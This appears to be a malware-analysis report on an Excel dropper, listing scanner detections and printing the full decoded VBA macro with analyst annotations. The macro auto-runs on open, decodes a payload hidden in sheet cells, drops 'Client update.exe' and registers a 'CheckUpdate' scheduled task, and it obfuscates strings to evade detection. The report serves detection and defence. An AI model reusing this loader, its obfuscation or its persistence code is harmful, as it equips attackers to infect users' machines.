MALICIOUS
236
Risk Score
Heuristics 7
-
ClamAV: Xls.Dropper.Agent-7578024-0 critical CLAMAV_DETECTION — ClamAV detected this file as malware: Xls.Dropper.Agent-7578024-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROS — Document contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER — Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script:
Set f = CreateObject("Scripting.FileSystemObject") -
CreateObject call high OLE_VBA_CREATEOBJ — CreateObject call. Matched line in script:
Set f = CreateObject("Scripting.FileSystemObject") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC — Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPEN — Workbook_Open macro. Matched line in script:
Private Sub Workbook_open() -
Environ() call (env variable access) low OLE_VBA_ENVIRON — Environ() call (env variable access). Matched line in script:
un = Environ("us" & "er" & "name")
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5746 bytes |
SHA-256: 53c14314dd7ee32b7caf2a857e484801086b81f5bd18b5511e700088211b8fad
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Analyst note: module metadata for the workbook-level module (ThisWorkbook).
' This is the module that hosts the Workbook_open handler below, which Excel
' runs automatically when the document is opened with macros enabled.
Private Sub Workbook_open()
' Analyst note: auto-exec entry point (fires when the workbook is opened with
' macros enabled). Stage 1 of the loader: reads an encoded payload from cells
' Z100:Z111 of the sheet named "Sheet1 " (note the trailing space), decodes it
' to bytes, writes them as %TEMP%\testfile.zip, extracts the archive into
' C:\Users\<username>\vals, then calls crtt() to register a scheduled task that
' launches the dropped executable. No downloader: the payload ships inside the
' workbook itself.
'Dim cellRange As Range
'Set cellRange = ActiveSheet.Range("B5:F5")
'For i = 1 To 5
' MsgBox cellRange.Cells(1, i).Value
'Next
' Analyst note: the five commented lines above are inert leftovers and never run.
Dim name As String
Dim save As String
Dim savep As String
Dim un As String
' Analyst note: "username" is assembled from fragments so the literal does not
' appear in the macro source; the Environ() read is still observable at runtime.
un = Environ("us" & "er" & "name")
' Analyst note: drop directory: C:\Users\<username>\vals
savep = "C:\" & "Users\" & un & "\vals"
' Analyst note: "firefox" is only a source of characters for the filename built
' in the "save = ..." assignment after the decode loop.
name = "firefox"
Dim lineText As String
' Analyst note: the encoded payload is stored as text in twelve cells of the
' sheet "Sheet1 " (trailing space); the cells are concatenated into one string.
' That sheet is hidden again at the end of this procedure.
lineText = ActiveWorkbook.Sheets("Sheet1 ").Range("Z100").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z101").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z102").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z103").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z104").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z105").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z106").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z107").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z108").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z109").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z110").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z111").Value
'example1
Dim lst As Long
Dim counter As Long
Dim length As Long
length = 1
lst = Len(lineText)
Dim dec() As Byte
'resize to n means n+1 byte
' Analyst note: two encoded characters per output byte, hence lst / 2 elements.
ReDim Preserve dec(lst / 2 - 1)
counter = 1
' Analyst note: custom decoder. Each pair of characters yields one byte:
'   low nibble  = Asc(char1) - 67
'   high nibble = (Asc(char2) - 67) * 16
' 67 is Asc("C"), so the payload alphabet is the letters "C".."R" standing for
' 0..15, low nibble first. This is why no hex digits, Chr() calls or numeric
' arrays appear in the source. Re-implementing this mapping is all an analyst
' needs to recover the embedded zip from the Z100:Z111 cells.
While counter < lst
dec(counter \ 2) = Asc(Mid(lineText, counter, length)) - 67 + (Asc(Mid(lineText, counter + 1, length)) - 67) * 16
counter = counter + 2
Wend
' Analyst note: Mid("firefox", 4, 1) = "e" and Mid("firefox", 7, 1) = "x", so
' the dropped filename is "Client update.exe".
save = "Client" & " update." & Mid(name, 4, 1) & Mid(name, 7, 1) & Mid(name, 4, 1)
'example2
' Analyst note: MouseAvailable gate. Plausibly an environment/anti-sandbox check
' (intent inferred, not confirmed); if it is False, nothing below executes.
If Application.MouseAvailable Then
Set f = CreateObject("Scripting.FileSystemObject")
' Analyst note: idempotence check — the whole drop is skipped if the executable
' already exists at <savep>\<save>.
If Not f.FileExists(savep & "\" & save) Then
If Dir(savep, vbDirectory) = "" Then
' Analyst note: On Error Resume Next is never reset with On Error GoTo 0, so it
' stays in effect for the rest of this procedure — failures of MkDir, the file
' write, CopyHere and crtt() are all silently suppressed.
On Error Resume Next
MkDir savep
End If
Dim fileNo As Integer
fileNo = FreeFile
On Error Resume Next
' Analyst note: decoded bytes written to %TEMP%\testfile.zip (host artifact #1).
' Nothing in this code deletes it afterwards.
Open Environ("Temp") & "\testfile.zip" For Binary Lock Read Write As #fileNo
Put #fileNo, 1, dec
Close #fileNo
'unz
' Analyst note: the archive is extracted with Shell.Application CopyHere rather
' than any archive tool; option 20 = 4 (no progress dialog) + 16 ("Yes to All").
' Extracted contents land in C:\Users\<username>\vals (host artifact #2).
' Excel spawning a Shell.Application COM object and writing under the user
' profile is the behavioural detection point here.
Set SA = CreateObject("Shell.Application")
SA.Namespace(savep & "\").CopyHere SA.Namespace(Environ("Temp") & "\testfile.zip").items, 20
' Analyst note: persistence — crtt() registers a scheduled task named
' "CheckUpdate" whose action is <savep>\<save>. crtt never assigns a return
' value, so c receives Empty and is never read.
c = crtt(savep, save, un)
End If
' Analyst note: sheet visibility swap — "Sheet1" is made visible and the
' payload-bearing "Sheet1 " (trailing space) is hidden.
ActiveWorkbook.Sheets("Sheet1").Visible = xlSheetVisible
ActiveWorkbook.Sheets("Sheet1 ").Visible = xlSheetHidden
'ActiveWorkbook.save
End If
End Sub
Function crtt(savep, save, un)
' Analyst note: persistence stage. Registers a Task Scheduler 2.0 task named
' "CheckUpdate" that runs <savep>\<save> (C:\Users\<username>\vals\Client update.exe
' as built by the caller) once about four minutes after registration and again
' at every logon of the current user.
'   savep - drop directory; save - dropped executable name; un - username from Environ().
' The function never assigns crtt, so it returns Empty; the caller discards it.
Dim dom As String
dom = Environ("user" & "domain")
' Analyst note: inv("ivres.elude") reverses and wraps the string, producing
' "Schedule.service" (ProgID lookup is case-insensitive, so this resolves to
' Schedule.Service, the Task Scheduler COM interface) without that literal ever
' appearing in the source. Instantiation of Schedule.Service from an Office
' process is a strong detection signal regardless of how the string was built.
Set s = CreateObject(inv("ivres.elude"))
'its important
Call s.Connect
'not important
' Analyst note: root task folder ("\") and a new, empty task definition.
Set f = s.getFolder("\")
Set n = s.NewTask(0)
'it is not me
Set r = n.RegistrationInfo
' Analyst note: Author "MS" and Description "CheckUpdate" become the task's
' metadata in the Task Scheduler UI and task XML — useful hunt values.
r.Author = "MS"
'and may not
r.Description = "CheckUpdate"
Set p = n.Principal
' Analyst note: LogonType 3 = TASK_LOGON_INTERACTIVE_TOKEN (runs in the user's
' interactive session; no stored credentials required).
p.LogonType = 3
'hehehehe
' Analyst note: ExecutionTimeLimit "P20D" is an ISO 8601 duration (20 days).
With n.settings
.Enabled = True
.runonlyifidle = False
.multipleinstances = 0
.allowdemandstart = True
.StartWhenAvailable = True
.ExecutionTimeLimit = "P20D"
End With
'1 for tie trigger, 9 for at logon
' Analyst note: triggers.Create(1) = TASK_TRIGGER_TIME (one-shot at
' startBoundary). The author's "tie trigger" means "time trigger".
Set t = n.triggers.Create(1)
t.Enabled = True
t.ID = "TID"
'4 min from now
' Analyst note: startBoundary set 4 minutes ahead via XmlTime(); DateAdd("n", ...)
' is the minutes interval.
t.startBoundary = XmlTime(DateAdd("n", 4, Now()))
' Analyst note: triggers.Create(9) = TASK_TRIGGER_LOGON, scoped to DOMAIN\username.
Set t2 = n.triggers.Create(9)
t2.Enabled = True
t2.ID = "T2ID"
t2.UserId = dom & "\" & un
' Analyst note: Actions.Create(0) = TASK_ACTION_EXEC; runs the dropped
' executable with the literal argument string "...".
Set a = n.Actions.Create(0)
a.Path = savep & "\" & save
a.Arguments = "..."
' and in the now we can
' Analyst note: RegisterTaskDefinition(path "CheckUpdate", definition,
' flags 6 = TASK_CREATE_OR_UPDATE, no user, no password, logonType 3 =
' interactive token). Resulting artifact: a task "\CheckUpdate" persisted in
' the Windows task store.
Call f.RegisterTaskDefinition("CheckUpdate", n, 6, , , 3)
End Function
Function inv(x As String)
' Analyst note: string de-obfuscation helper. Reverses x character by character
' and returns "Sch" & reversed & "ce". The single call site passes "ivres.elude",
' which reverses to "edule.servi" and yields "Schedule.service".
' Uses "+" for concatenation (valid on String operands; "&" is the VBA idiom).
Dim a As String
Dim counter As Integer
a = ""
counter = Len(x)
' Analyst note: walk from the last character down to the first.
While counter >= 1
a = a + Mid(x, counter, 1)
counter = counter - 1
Wend
inv = "Sch" & a & "ce"
End Function
Function XmlTime(t)
' Analyst note: formats a VBA Date t as "yyyy-MM-ddTHH:mm:ss" for use as the
' task's startBoundary. Zero-padding is done by prefixing "0" and keeping the
' rightmost two characters; the year is emitted unpadded. No timezone
' designator is appended, so the Task Scheduler presumably interprets the
' value as local time — confirm against the startBoundary documentation.
Dim cSecond, cMinute, CHour, cDay, cMonth, cYear
Dim tTime, tDate
cSecond = "0" & Second(t)
cMinute = "0" & Minute(t)
CHour = "0" & Hour(t)
cDay = "0" & Day(t)
cMonth = "0" & Month(t)
cYear = Year(t)
tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & ":" & Right(cSecond, 2)
tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2)
XmlTime = tDate & "T" & tTime
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Analyst note: sheet-module metadata only; in this extract neither sheet
' module carries any code. The loader refers to worksheets by tab name
' ("Sheet1" and "Sheet1 " with a trailing space), and which of these code
' modules backs the payload-bearing tab cannot be determined from the
' attributes alone.